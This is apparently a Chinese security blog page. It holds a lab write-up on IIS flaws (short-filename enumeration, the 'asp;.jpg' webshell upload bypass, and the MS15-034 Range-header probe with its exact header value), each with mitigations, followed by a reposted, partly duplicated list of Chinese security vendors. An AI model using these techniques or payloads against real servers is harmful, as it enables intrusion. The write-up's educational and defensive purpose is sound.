Ø 漏洞分析:Windows 支持以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件。基于Windows的IIS服务器默认根目录C:\inetpub\wwwroot下的网页脚本文件和目录符合一定条件时,会生成相应的短文件名。此时,攻击者利用HTTP的DEBUG、OPTIONS、GET、POST、HEAD、TRACE等方法携带波浪号,可以对IIS服务器短文件名进行暴力猜解,依据返回的页面信息和状态码来确认真实存在的文件名,从而获取服务器敏感信息,为下一步攻击做准备。
Ø 漏洞类型:可远程利用,可触发信息泄露
Ø 漏洞复现:
复现环境:Windows 7 x64位,默认IIS 7.5
1. 通过cmd下进入IIS网站根目录C:\inetpub\wwwroot,输入“dir /x”查看已存在的短文件名:
 
2. 使用公开POC或者扫描程序探测目标靶机的短文件名,成功猜解到服务器根目录短文件名称:
 
 
Ø 漏洞缓解:
1. 限制IIS服务器HTTP方法,除了必要的GET、POST方法,其他HTTP方法建议关闭,视情况开启;
2. IIS服务器文件建议使用复杂字符或者中文命名,增加后期攻击者暴力破解难度;
3. 针对已存在的IIS服务器,建议关闭NTFS 8.3文件格式的支持或者修改注册表禁用短文件名功能。
注:详细原理和解决方案请参考:https://www.freebuf.com/articles/web/172561.html
 5.  代码执行漏洞
      5.1 Microsoft IIS畸形文件扩展名绕过安全限制漏洞  CVE-2009-4444
      5.1.1 漏洞描述:IIS服务器错误的执行了带有多个扩展名的文件中所包含的ASP代码。例如malicious.asp;.jpg被执行为了ASP文件。很多文件上传程序仅检查文件扩展名的最后部分,因此这可能导致绕过保护机制向服务器上传恶意可执行文件。
      5.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 6.0
Ø 漏洞分析:此漏洞主要原因是IIS第三方上传应用没有限制文件上传格式或者限制不够严格,只检查了文件末尾的格式,导致攻击者可以将如Asp webshell伪装成malicious.asp;.jpg文件格式上传到IIS服务器。IIS的Classic ASP功能在处理asp文件时,被此畸形文件格式的分号截断了,认为是asp文件并进行相应的解析处理。攻击者则在获取上传路径后通过远程访问执行此webshell,控制IIS服务器甚至Windows宿主机器。
Ø 漏洞类型:可远程利用,文件上传绕过可触发代码执行
Ø 漏洞复现:
复现环境:Win server 2003 Sp2 32位企业版,默认IIS 6.0
1. IIS服务器根目录下创建一个名为aspwebshell.asp;.jpg的文件,用记事本打开,放入asp webshell代码(实际利用过程中是通过第三方应用上传绕过漏洞上传此文件,并设法获取此上传路径);
 
2. 通过浏览器远程访问此文件,http://192.168.180.201/aspwebshell.asp;.jpg,成功执行asp webshell代码:
 
 
Ø 漏洞缓解:
1. 严格限制IIS第三方应用上传文件的格式;
2. 此漏洞仅影响IIS 6.0,其他版本解析asp文件不会被分号截断,可升级至无此漏洞的IIS版本。
   5.2 (MS15-034)Microsoft IIS远程代码执行漏洞复现  CVE-2015-1635 
      5.2.1 漏洞描述:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。           5.2.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 7.5、IIS 8.0、IIS 8.5
Ø 漏洞分析:
    IIS进程w3wp.exe接收到HTTP请求后,将数据缓存到内核中,并整合HTTP回应头,最后由http.sys组织数据包经由网络内核组件发送出去。请求中包括Range对象的指定范围,而缓存中则包含了http文件和大小信息等。
 根据公开POC,构造包含“Range: bytes=0-18446744073709551615”的HTTP请求并发送到IIS 7.5-8.5服务器,如果IIS服务器返回“Requested Range Not Satisfiable”,则存在漏洞,如果返回“The request has an invalid header name”或者没有回应,则说明漏洞已经修补或者不存在漏洞。
Ø 漏洞类型:可远程利用,可触发代码执行
Ø 漏洞复现:
 复现环境:Win server 2008 R2 64位企业版,默认IIS 7.5
1. 开启IIS默认网站
2. 根据公开poc发送包含特殊设计的Range字段攻击靶机环境,成功检测到漏洞:
 
Ø 漏洞缓解:
1. 禁用 IIS 内核缓存,详情见微软官方公告:
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034
2. 升级IIS至IIS 10.0版本,此版本不存在此漏洞。
 三、 漏洞总结
IIS 远程漏洞主要包括缓冲区溢出、认证绕过、拒绝服务、代码执行和信息泄露漏洞,本地漏洞主要分布在信息泄露和权限提升漏洞分类,大部分漏洞利用难度较大,但是一旦成功被攻击者利用,影响的不仅仅只是IIS服务器,甚至可能是运行IIS的Windows主机。如果用户主机被利用,那么攻击者可以将此台主机当作肉鸡攻击内网中的其他主机、服务器或者网络设备等,后果不堪设想。
  如果IIS服务器的网站配置不当,攻击者可以通过IIS短文件名猜解和暴力破解用户隐私文件并进行认证绕过访问,获取用户隐私信息。此外,不合理的上传限制也会导致攻击者上传含有恶意代码或webshell并伪装成合法的文件,进而导致IIS服务器被攻陷。攻击者利用提权漏洞或者命令执行等漏洞,对IIS服务器甚至是Windows操作系统进行进一步的攻击。无论是对IIS服务器本身的服务还是该IIS服务器所处的网络环境,IIS漏洞都是一个极大的隐患,也让IIS网站管理员和不少运维人员心惊胆战。

国内的主要安全产品及厂商

Web安全渗透sq_smile 发表了文章 • 0 个评论 • 78 次浏览 • 2018-12-28 11:42 • 来自相关话题

链接:https://www.zhihu.com/question/20334043/answer/183326406
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
国内哪些公司在做企业版安全产品开发?
问题太大了,做企业版安全产品的N多,有硬件设备、有软件、也有做SAAS在线服务的。
国外的一些安全软件是否在中国只做代理销售,基本不会在国内开发?
国外的安全软件除非个别的,基本在国内都有代理销售。
有没有国外的安全软件开发公司在中国有分公司或办事处?规模比较大的国外安全公司很多在国内有办事处。 
这个是一个兄弟整理的安全产品厂商分类,找不到出处了。
1. 防火墙类(UTM&FW&NGFW)厂商
2. WAF(web 应用防火墙)厂商
3. 数据库审计类厂家
4. 运维审计厂商
5. 网站安全厂商
6. 邮件类安全厂商
7. 身份鉴别厂家
8. 防毒墙&杀毒软件厂商
9. 安全咨询类厂家
10. 网闸安全厂家
11. 等级保护评估系统
12. 数据防泄漏(DLP)
13. 漏洞扫描(主机&web)
14. SOC(安全运维平台)&SIEM(安全事件管理)
15. 内网安全管理(含准入)
16. 上网行为管理
17. 远程接入安全(VPN)
18. 入侵检测和防御(IDS&IPS)
19. 抗拒绝服务攻击(DDoS)
20. 网页防篡改 
其他公司细分(跟游侠打过招呼了,感谢辛苦整理):<img src="https://pic4.zhimg.com/50/v2-1e029de4aae7f248926b2459cbe6977f_hd.jpg" data-rawwidth="480" data-rawheight="360" class="origin_image zh-lightbox-thumb" width="480" data-original="https://pic4.zhimg.com/v2-1e029de4aae7f248926b2459cbe6977f_r.jpg">
物理安全
存储介质信息消除/粉碎机:北信源、和升达、科密、30所、利谱、交大捷普、兰天致信、中超伟业、博智软件、方德信安、深圳汇远佳禾网络安全防火墙/UTM/安全网关/下一代防火墙:天融信、山石网科、启明星辰、网御星云、绿盟科技、安恒信息、蓝盾、华为、软云神州、杭州迪普、华清信安、东软、上讯信息、利谱、深信服、360、卫士通、H3C、交大捷普、信安世纪、任子行、上海纽盾、金电网安、亚信安全、北京擎企、金山、君众甲匠、优炫、海峡信息、安信华、博智软件、中科曙光、中科网威、江民科技、六壬网安、安码科技、点点星光入侵检测/防御:启明星辰、绿盟科技、网御星云、360、天融信、铱迅信息、蓝盾、杭州迪普、山石网科、安恒信息、交大捷普、任子行、经纬信安、漏洞盒子/网藤风险感知、华清信安、上海纽盾、东软、恒安嘉新、安天、金山、君众甲匠、海峡信息、博智软件、H3C、中科网威、江民科技、六壬网安、青藤云安全无线入侵检测/防御:360、北京锐云通信、山东闻道通信VPN:深信服、天融信、蓝盾、360、华为、绿盟科技、卫士通、信安世纪、奥联科技、启明星辰、南京易安联、华清信安、上海纽盾、东软、海峡信息、博智软件、H3C、江南信安、弘积科技、山东确信上网行为管理:360、深信服、蓝盾、华为、莱克斯、网际思安、软云神州、杭州迪普、北信源、网鼎芯睿、陕通、上海新网程、奥联科技、交大捷普、任子行、上海纽盾、东软、Panabit、北京擎企、金山、盛世光明、博智软件、H3C、万网博通、极安、江民科技、迈科网络、六壬网安、弘积科技网络安全审计:天融信、莱克斯、启明星辰、交大捷普、绿盟科技、蓝盾、广州国迈、软云神州、任子行、雨人、上海观安、上海纽盾、360、恒安嘉新、盛世光明、海峡信息、博智软件、杭州迪普、中科新业、重庆智多网络流量控制:360、深信服、流控大师、Panabit、蓝盾、软云神州、网鼎芯睿、互普&溢信(IP-Guard)、东华软件、上海纽盾、灵州网络、恒安嘉新、北京擎企、金山、盛世光明、杭州迪普、万网博通、极安、迈科网络网络流量分析:科来公司、东华软件、绿盟科技、网鼎芯睿、上海观安、上海纽盾、恒安嘉新、Panabit、亚信安全、安天、江民科技、华青融天、迈科网络防病毒网关/防毒墙:网御星云、蓝盾、冠群金辰、杭州迪普、瑞星、360、安恒信息、山石网科、亚信安全、安天、金山、天融信、海峡信息、安信华、博智软件、江民科技APT未知威胁发现:安恒信息、科来公司、360、天融信、启明星辰、东巽科技、安天、绿盟科技、华为、神州网云、成都力合智远、经纬信安、兰云科技、中铁信睿安、卫达安全、恒安嘉新、宝利九章、亚信安全、安赛创想、金山、海峡信息、博智软件、知道创宇、江民科技、六壬网安抗DDoS产品:绿盟科技、华为、中新网安、铱迅信息、启明星辰、傲盾、蓝盾、杭州迪普、华清信安、安恒信息、兰云科技、上海纽盾、卫达安全、任子行、青松云安全、天融信、360、北大千方、知道创宇、神荼科技抗DDoS服务:阿里云、腾讯云、金山云、百度安全/安全宝、360、安恒信息、兰云科技、网宿科技、上海云盾、中新网安、卫达安全、安全狗、青松云安全、电信云堤、UCloud、智卓云盾、知道创宇、蓝盾网闸:360、北京安盟、利谱、启明星辰、杭州合众、北京盖特佳、天融信、交大捷普、天行网安、伟思、金电网安、赛博兴安、东软、海峡信息、安信华、重庆爱思安全隔离与信息单向导入设备/单向传输机器:深圳中锐源、中铁信安、中孚信息、杭州合众、国保金泰、天融信、赛博兴安、普世科技、锐安、金电网安、北京安盟、中科网威、山石网科、哈尔滨朗威、利谱、北京远为软件网络缓存加速·产品:缓存大师WebCache、锐捷、优络普、Panabit、安信华网络缓存加速·服务:知道创宇、阿里云、百度云、腾讯云、帝恩思、DNSPod网络准入控制:北信源、无锡宝界、蓝盾、互普&溢信(IP-Guard)、启明星辰、金盾软件、广州国迈、盈高科技、画方科技、联软、中软、上讯信息、交大捷普、信安世纪、中孚信息、上海纽盾、艾科网信、海峡信息、博智软件、江民科技、亚东软件负载均衡:深信服、北京中科四方、东华软件、信安世纪、灵州网络、北京华夏创新、北京楷然昊天、上海云速、湖南麒麟、杭州迪普、启明星辰、南京易安联、上海纽盾、Panabit、北京擎企、H3C、弘积科技、北京远为软件、福建伊时代应用交付:智恒科技、深信服、信安世纪、瑞友天翼、360、天融信、东软、任子行、优炫、中科曙光、弘积科技加密机/密码机:江南科友、网御星云、天融信、三未信安、山东得安、卫士通、山东渔翁、无锡江南、江南天安、江南博仁、兴唐通信、中安网脉、君众甲匠、立思辰、江南信安、山东确信、信安世纪DNS安全:电信云堤、厦门帝恩思、知道创宇不良信息识别与监测:金惠科技主机安全桌面管理/主机审计:北信源、汉邦、联软、蓝盾、互普&溢信(IP-Guard)、启明星辰、网御星云、360、天融信、金盾软件、广州国迈、软云神州、哈尔滨朗威、上海创多、深圳金天眼、杭州正杰、浙江远望电子、北京盖特佳、峰盛科技、中软、卫士通、沈阳通软、圣博润、上讯信息、交大捷普、中孚信息、上海浩迈、金山、海峡信息、博智软件、江民科技、江南信安、山丽信息、亚东软件、706所、中电瑞铠单机防病毒:瑞星、江民科技、金山、360、百度、腾讯、东方微点、费尔、火绒、亚信安全、安天、博智软件网络防病毒:瑞星、360、金山、江民科技、东方微点、北信源、亚信安全、安天、博智软件主机文档加密与权限控制/HDLP:亿赛通、天锐绿盾、时代亿信、明朝万达、蓝盾、互普&溢信(IP-Guard)、北信源、金盾软件、启明星辰、北京盖特佳、峰盛科技、中软、卫士通、上海祥殷、上海前沿、杭州华途、江苏敏捷、思智泰克、交大捷普、中孚信息、福州深空、天融信、思睿嘉得、合力思腾、深圳虹安、上讯信息、成都力合智远、莱克斯、365数据安全/四川西图、山东申启、金山、天空卫士、锐思特、赛猊腾龙、海峡信息、深信达、博智软件、江民科技、天喻软件、上海谐桐、亚东软件、武汉百易时代源代码加密及嵌入式开发源码加密:深信达、明朝万达、亿赛通、IP-Guard、山丽信息、天锐绿盾、互普&溢信(IP-Guard)、中软、虹安主机安全加固:浪潮、椒图、安全狗、广州国迈、中软华泰、上海观安、可信华泰、中嘉华诚、中航嘉信、易路平安、亚信安全、安天、优炫、安普诺、中超伟业、中科曙光、神荼科技、青藤云安全、安恒信息终端登录/身份认证:上海格尔、吉大正元、卫士通、信安世纪、上讯信息、南京易安联、北信源、九州云腾、中孚信息、博智软件、哈尔滨朗威移动存储介质管理:北信源、北京天桥、启明星辰、金盾软件、广州国迈、哈尔滨朗威、上海创多、亿赛通、交大捷普、上海浩迈、上海格尔、安天、金山、天喻软件、山丽信息、亚东软件补丁管理:北信源、360、启明星辰、金盾软件、上海创多、交大捷普、亚信安全、金山打印安全/打印管理/打印审计:北京恒安讯佳、北信源、中孚信息、安普锐、天锐绿盾、金山、保旺达、哈尔滨朗威、天喻软件、瑞达信息、山丽信息、武汉百易时代、鼎盾科技、思为同飞应用安全网页防篡改:安恒信息、智恒科技、赛蓝、山东中创、绿盟科技、启明星辰、上海天存、上海天泰、福州深空、北京通元、国舜股份、蓝盾、安全狗、WebRay远江、杭州迪普、上讯信息、交大捷普、青松云安全、海峡信息、江民科技、立思辰、六壬网安Web应用防火墙·WAF·硬件:安恒信息、启明星辰、绿盟科技、天融信、铱迅信息、知道创宇、上海天泰、杭州迪普、山东中创、WebRay远江、蓝盾、北京千来信安、中新网安、软云神州、中软华泰、上讯信息、上海天存、利谱、交大捷普、任子行、中铁信睿安、上海纽盾、360、卫达安全、金电网安、安赛创想、东软、海峡信息、安信华、博智软件、山石网科、江民科技、立思辰、六壬网安、安码科技、神荼科技Web应用防火墙·WAF·软件:福州深空、安恒信息、铱迅信息、安全狗、云锁、青松云安全、上海天存、安码科技Web应用防火墙·服务&云WAF:安恒信息、阿里云、腾讯云、360、知道创宇、上海有云、湖盟、百度安全/安全宝、蓝盾、北京千来信安、中软华泰、上讯信息、快云、斗象科技/网藤风险感知、网宿科技、上海云盾、青松云安全、电信云堤、UCloud、数梦工场WEB漏洞扫描:安恒信息、四叶草安全、国舜股份、绿盟科技、知道创宇、WebRay远江、安赛创想、安犬漏洞扫描云平台、启明星辰、经纬信安、上海观安、斗象科技/漏洞盒子/网藤风险感知、恒安嘉新、安识科技、H3C、六壬网安、安码科技网站安全监测产品:安恒信息、绿盟科技、知道创宇、360、WebRay远江、任子行、四叶草安全、安全狗、恒安嘉新、安信华、H3C、江民科技、安普诺、立思辰、浙江乾冠网站安全监测服务:安恒信息、绿盟科技、知道创宇、360、百度安全/安全宝、WebRay远江、北京千来信安、任子行、安全狗、恒安嘉新、四叶草安全、浙江乾冠邮件安全产品:守内安、网际思安、蓝盾、敏讯、冠群金辰、盈世CoreMail、时代亿信、上海格尔、安宁、凌久、国瑞信安、蓝海星、北京方向标、上海青羽/靠谱邮件、亚信安全、安宁、安普诺、武汉百易时代数据库漏洞扫描:安恒信息、安信通、安华金和、建恒信安、中安星云、杭州闪捷数据库防火墙:安恒信息、安华金和、中安比特/中安威士、帕拉迪/汉领信息、杭州美创、中安星云、杭州闪捷数据库加密和脱敏:中安比特/中安威士、安华金和、迈科龙、中安星云、杭州美创、上海观安、优炫、广州鼎甲、杭州闪捷数据库审计:安恒信息、安华金和、思福迪、启明星辰、网御星云、天融信、极地银河、山东中创、蓝盾、北信源、莱克斯、软云神州、绿盟科技、上讯信息、中安比特/中安威士、交大捷普、金盾软件、昂楷科技、帕拉迪/汉领信息、上海纽盾、东软、杭州美创、优炫、海峡信息、安信华、博智软件、中安星云、东华软件、六壬网安、思为同飞、706所、杭州闪捷半自动&自动化渗透平台:安恒信息、安络科技、四叶草安全应用统一身份管理/身份认证/单点登录/认证网关/PKI/CA/数字证书/令牌/各种KEY:天诚安信、派拉软件、神州融信、上海格尔、天威诚信、信安世纪、东软、吉大正元、安识科技、北京安讯奔、九州云腾、中科曙光、洋葱安全、极验验证、立思辰、江南信安、山东确信 | 各省都有CA,这个就单列了、中科恒伦、上海林果、福建伊时代代码防火墙:上海观安加密安全设备/NDLP:福建伊时代、时代亿信、365数据安全、天空卫士、思为同飞反钓鱼/反欺诈:电信云堤、国舜股份、知道创宇、百度、阿里、腾讯、360、安天、亚信安全、安恒信息、江民科技、华青融天语音安全:北京无限互联数据安全数据备份:上海爱数、杭州美创、火星高科&亚细亚智业、苏州美天网络、信核数据、上讯信息、英方股份、上海联鼎、亿备&广州鼎鼎、和力记易、广州鼎甲、安码科技、南京壹进制、浪擎科技、福建伊时代虚拟机备份与恢复:成都云祺、英方股份、和力记易、广州鼎甲、北京远为软件数据清除工具:中孚信息、北京天桥、上海浩迈、万里红、中超伟业、博智软件、方德信安、哈尔滨朗威移动安全/虚拟化安全/云安全虚拟化安全防护:安恒信息、启明星辰、广州国迈、北信源、中软、南京易安联、山石网科、阿姆瑞特、上海观安、东软、安全狗、云锁、亚信安全、金山、蓝盾、北京远为软件手机防病毒:腾讯、瑞星、金山、360、网秦、百度、中软、安天、恒安嘉新、亚信安全、蓝盾移动终端管理/EMM/MDM:国信灵通/启迪国信、北信源、360、明朝万达、中软、安天、上讯信息、北京珊瑚灵御、亚信安全、金山、蓝盾、江民科技、江南信安CASB/云业务安全接入代理:炼石网络、云安宝、信云科技、绿盟科技、启明星辰手机APP安全:梆梆安全、北京智游网安/爱加密、阿里聚安全、360、任子行、北京鼎源科技、腾讯御安全、恒安嘉新、安普诺、安码科技基于云的安全服务:青松云安全、青藤云安全、百度云、腾讯云、阿里云、360、华为、安全宝、山石网科、万般上品、东软、卫达安全、白帽汇、海峡信息、四叶草安全、中国电信·安全帮 | 此条目待调整、待完善!大数据安全:安恒信息、启明星辰、绿盟科技、360、派拉软件、观数科技、瀚思、天行网安、上海观安、聚铭网络、中孚信息、恒安嘉新、志翔科技、知道创宇、科来公司、安码科技、杭州美创 | 这是一个比较纠结的分类,因为牵扯到的内容太多……现在主流的安全厂家几乎都能做一部分,但是……这个分类可能近期会做细化安全管理SIEM/日志管理/日志审计/SOC/安管平台:安恒信息、思福迪、360、天融信、启明星辰、东软、蓝盾、蚁巡、江南天安、北信源、上讯信息、赛克蓝德、神州泰岳、交大捷普、派拉软件、瀚思、中铁信睿安、聚铭网络、华清信安、上海纽盾、亚信安全、优炫、安信华、H3C、华青融天、安码科技、北京中安智达、706所、福建伊时代运维审计/4A/堡垒机:安恒信息、思福迪、帕拉迪/汉领信息、浙江齐治、尚思科技、江南科友、绿盟科技、天融信、启明星辰、建恒信安、蓝盾、华为、泰然神州、上海艺赛旗、北京极地、信安世纪、圣博润、江南天安、国迈、上讯信息、神州泰岳、亿阳信通、麒麟、云安宝、交大捷普、德讯科技、任子行、派拉软件、上海观安、金盾软件、智恒科技、东软、金电网安、亚信安全、北京安讯奔、盛世光明、优炫、海峡信息、保旺达、安信华、中科曙光、六壬网安网管软件/ITIL:广通信达、网强、汉远网智、北塔、蚁巡、华为、锐捷、摩卡[华胜天成]、国聿、上讯信息、交大捷普、飞思安诺/飞思网巡、恒安嘉新、优炫、艾科网信、海峡信息、迈科网络、东华软件漏洞扫描与管理:安恒信息、榕基、启明星辰、绿盟科技、铱迅信息、极地银河、蓝盾、WebRay远江、江南天安、杭州迪普、天融信、交大捷普、安犬漏洞扫描云平台、经纬信安、上海观安、中铁信睿安、斗象科技/漏洞盒子/网藤风险感知、宿州东辉、四叶草安全、恒安嘉新、安天、蓝盾、君众甲匠、博智软件、中科网威、立思辰、六壬网安、安普诺网络和主机配置核查系统:安恒信息、思福迪、绿盟科技、启明星辰、聚铭网络、北京随方信息、博智软件主机安全保密检查工具:中孚信息、北信源、北京天桥、哈尔滨朗威、万里红、华安保、上海浩迈、博智软件、方德信安信息安全等级保护测评工具箱:安恒信息、国瑞信安、圣博润、公安一所、锐安 | 注:市面上多家厂家均生产此产品,但公安部仅指定了5家作为“合格的”生产单位!网络安全态势感知:安恒信息、知道创宇、360、绿盟科技、WebRay远江盛邦、四叶草安全、任子行、上海观安、兰云科技、聚铭网络、恒安嘉新、白帽汇、杭州合众、亚信安全、安天、郑州赛欧思、江民科技、科来公司、安码科技应急处置工具箱:安恒信息工控安全产品与厂商大全威努特、匡恩网络、谷神星、海天炜业、珠海鸿瑞、力控华康、启明星辰、绿盟科技、中科网威、三零卫士、安恒信息、北京网藤科技、天地和兴、安恒信息……工控防火墙:中科网威、威努特、匡恩网络、谷神星、海天炜业、力控华康、天地和兴、安点科技、网藤科技、卫达安全、博智软件、九略智能工控安全审计:威努特、天地和兴、匡恩网络、网藤科技、斗象科技/漏洞盒子/网藤风险感知、安点科技、博智软件、安恒信息、知道创宇、中科网威工控漏洞扫描/挖掘:天地和兴、匡恩网络、网藤科技、斗象科技/漏洞盒子/网藤风险感知、博智软件、知道创宇工控安管平台:天地和兴、匡恩网络、中科网威工控主机安全防护:天地和兴、网藤科技、安点科技、九略智能工控入侵检测/威胁感知/入侵防御:安点科技、天地和兴、网藤科技、博智软件、科来公司、中科网威工控网闸:安点科技、中科网威工控防泄密:匡恩网络工控检查工具箱:安恒信息、工控蜜罐:匡恩网络、工控攻防实验室:匡恩网络、网藤科技、博智软件工控态势感知:安恒信息、博智软件、360、知道创宇、浙江乾冠、九略智能中国自主可控网络安全产品与厂商数据来源于申威产业联盟、龙芯产业联盟、中关村可信计算产业联盟自主可信专委会;就自主可控行业的特殊性而言,很多大厂商是作为特供产品进行市场宣传,而小厂商只作为品牌规划,并没有特殊宣传,在数据收集时可能会导致内容不全面;对于名单中未涉及的厂商,可以单独联系, 告知欲添加的分类、公司名称(需在上述3个联盟中);感谢中关村可信联盟自主可信专委会相关工作人员整理!防火墙:中科神威、天融信、网御星云、东软、中科曙光、蓝盾、中航鸿电、中船综合院、706所入侵检测/防御:中科神威、网神、中科曙光、安恒信息 、绿盟科技、汉柏漏洞扫描系统:中科神威、安恒信息 、绿盟科技安全管理平台:启明星辰、中科神威、360网闸/安全隔离与信息单向导入设备:国保金泰、中科神威、北京安盟、赛博兴安加密机:江南天安终端安全:北信源、江民科技Web应用防火墙:上海天泰堡垒机:建恒信安、江南寰宇负载均衡:般固科技防毒墙:江民科技备份一体机:壹进制网络流量分析:北京卓迅网络准入控制:画方科技存储:创新科、同有飞骥未分类子类舆情监控:中国舆情网、优捷信达、乐思、红麦、中科点击、泰一舆情、探宝、拓尔思、本果、软云神州、西盈、任子行、网藤风险感知、南京快页数码、博智软件、北京中安智达威胁情报:微步在线、上海观安、斗象科技/http://FreeBuf.com/漏洞盒子、恒安嘉新、白帽汇、天际友盟、知道创宇、360、安恒信息国产操作系统:Deepin深度、RedFlag红旗、Kylin麒麟、NeoKylin中标麒麟、StartOS起点/雨林木风OS、凝思磐石安全操作系统、共创Linux、思普Linux国产数据库:达梦数据库、东软OpenBASE、国信贝斯iBase、人大金仓KingBase、南大通用GBase业务风控安全:锦佰安、指掌易、邦盛、岂安、行邑、同盾、通付盾蜜罐:安恒信息、三零卫士、凌晨网络、绿盟科技、默安科技安全硬件平台/工控机:新汉、阿普奇、盛博、集智达、英德斯、福升威尔、华北科技、艾宝、华北工控、研祥、祈飞、研华,立华,惠尔,智威智能数据恢复:苏州美天网络、金山安全、易数科技、华客、飞客、众成、博智软件数据库准入:杭州美创数据库堡垒机:杭州美创红黑电源滤波插座:保旺达、启航智通电磁屏蔽柜:启航智通、信安邦数字取证:美亚柏科、盘石软件安全计算机:瑞达信息 查看全部
链接:https://www.zhihu.com/question/20334043/answer/183326406
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
国内哪些公司在做企业版安全产品开发?
问题太大了,做企业版安全产品的N多,有硬件设备、有软件、也有做SAAS在线服务的。
国外的一些安全软件是否在中国只做代理销售,基本不会在国内开发?
国外的安全软件除非个别的,基本在国内都有代理销售。
有没有国外的安全软件开发公司在中国有分公司或办事处?规模比较大的国外安全公司很多在国内有办事处。 
这个是一个兄弟整理的安全产品厂商分类,找不到出处了。
1. 防火墙类(UTM&FW&NGFW)厂商
2. WAF(web 应用防火墙)厂商
3. 数据库审计类厂家
4. 运维审计厂商
5. 网站安全厂商
6. 邮件类安全厂商
7. 身份鉴别厂家
8. 防毒墙&杀毒软件厂商
9. 安全咨询类厂家
10. 网闸安全厂家
11. 等级保护评估系统
12. 数据防泄漏(DLP)
13. 漏洞扫描(主机&web)
14. SOC(安全运维平台)&SIEM(安全事件管理)
15. 内网安全管理(含准入)
16. 上网行为管理
17. 远程接入安全(VPN)
18. 入侵检测和防御(IDS&IPS)
19. 抗拒绝服务攻击(DDoS)
20. 网页防篡改 
其他公司细分(跟游侠打过招呼了,感谢辛苦整理):<img src="https://pic4.zhimg.com/50/v2-1e029de4aae7f248926b2459cbe6977f_hd.jpg" data-rawwidth="480" data-rawheight="360" class="origin_image zh-lightbox-thumb" width="480" data-original="https://pic4.zhimg.com/v2-1e029de4aae7f248926b2459cbe6977f_r.jpg">
物理安全
  • 存储介质信息消除/粉碎机:北信源、和升达、科密、30所、利谱、交大捷普、兰天致信、中超伟业、博智软件、方德信安、深圳汇远佳禾
网络安全
  • 防火墙/UTM/安全网关/下一代防火墙:天融信、山石网科、启明星辰、网御星云、绿盟科技、安恒信息、蓝盾、华为、软云神州、杭州迪普、华清信安、东软、上讯信息、利谱、深信服、360、卫士通、H3C、交大捷普、信安世纪、任子行、上海纽盾、金电网安、亚信安全、北京擎企、金山、君众甲匠、优炫、海峡信息、安信华、博智软件、中科曙光、中科网威、江民科技、六壬网安、安码科技、点点星光
  • 入侵检测/防御:启明星辰、绿盟科技、网御星云、360、天融信、铱迅信息、蓝盾、杭州迪普、山石网科、安恒信息、交大捷普、任子行、经纬信安、漏洞盒子/网藤风险感知、华清信安、上海纽盾、东软、恒安嘉新、安天、金山、君众甲匠、海峡信息、博智软件、H3C、中科网威、江民科技、六壬网安、青藤云安全
  • 无线入侵检测/防御:360、北京锐云通信、山东闻道通信
  • VPN:深信服、天融信、蓝盾、360、华为、绿盟科技、卫士通、信安世纪、奥联科技、启明星辰、南京易安联、华清信安、上海纽盾、东软、海峡信息、博智软件、H3C、江南信安、弘积科技、山东确信
  • 上网行为管理:360、深信服、蓝盾、华为、莱克斯、网际思安、软云神州、杭州迪普、北信源、网鼎芯睿、陕通、上海新网程、奥联科技、交大捷普、任子行、上海纽盾、东软、Panabit、北京擎企、金山、盛世光明、博智软件、H3C、万网博通、极安、江民科技、迈科网络、六壬网安、弘积科技
  • 网络安全审计:天融信、莱克斯、启明星辰、交大捷普、绿盟科技、蓝盾、广州国迈、软云神州、任子行、雨人、上海观安、上海纽盾、360、恒安嘉新、盛世光明、海峡信息、博智软件、杭州迪普、中科新业、重庆智多
  • 网络流量控制:360、深信服、流控大师、Panabit、蓝盾、软云神州、网鼎芯睿、互普&溢信(IP-Guard)、东华软件、上海纽盾、灵州网络、恒安嘉新、北京擎企、金山、盛世光明、杭州迪普、万网博通、极安、迈科网络
  • 网络流量分析:科来公司、东华软件、绿盟科技、网鼎芯睿、上海观安、上海纽盾、恒安嘉新、Panabit、亚信安全、安天、江民科技、华青融天、迈科网络
  • 防病毒网关/防毒墙:网御星云、蓝盾、冠群金辰、杭州迪普、瑞星、360、安恒信息、山石网科、亚信安全、安天、金山、天融信、海峡信息、安信华、博智软件、江民科技
  • APT未知威胁发现:安恒信息、科来公司、360、天融信、启明星辰、东巽科技、安天、绿盟科技、华为、神州网云、成都力合智远、经纬信安、兰云科技、中铁信睿安、卫达安全、恒安嘉新、宝利九章、亚信安全、安赛创想、金山、海峡信息、博智软件、知道创宇、江民科技、六壬网安
  • 抗DDoS产品:绿盟科技、华为、中新网安、铱迅信息、启明星辰、傲盾、蓝盾、杭州迪普、华清信安、安恒信息、兰云科技、上海纽盾、卫达安全、任子行、青松云安全、天融信、360、北大千方、知道创宇、神荼科技
  • 抗DDoS服务:阿里云、腾讯云、金山云、百度安全/安全宝、360、安恒信息、兰云科技、网宿科技、上海云盾、中新网安、卫达安全、安全狗、青松云安全、电信云堤、UCloud、智卓云盾、知道创宇、蓝盾
  • 网闸:360、北京安盟、利谱、启明星辰、杭州合众、北京盖特佳、天融信、交大捷普、天行网安、伟思、金电网安、赛博兴安、东软、海峡信息、安信华、重庆爱思
  • 安全隔离与信息单向导入设备/单向传输机器:深圳中锐源、中铁信安、中孚信息、杭州合众、国保金泰、天融信、赛博兴安、普世科技、锐安、金电网安、北京安盟、中科网威、山石网科、哈尔滨朗威、利谱、北京远为软件
  • 网络缓存加速·产品:缓存大师WebCache、锐捷、优络普、Panabit、安信华
  • 网络缓存加速·服务:知道创宇、阿里云、百度云、腾讯云、帝恩思、DNSPod
  • 网络准入控制:北信源、无锡宝界、蓝盾、互普&溢信(IP-Guard)、启明星辰、金盾软件、广州国迈、盈高科技、画方科技、联软、中软、上讯信息、交大捷普、信安世纪、中孚信息、上海纽盾、艾科网信、海峡信息、博智软件、江民科技、亚东软件
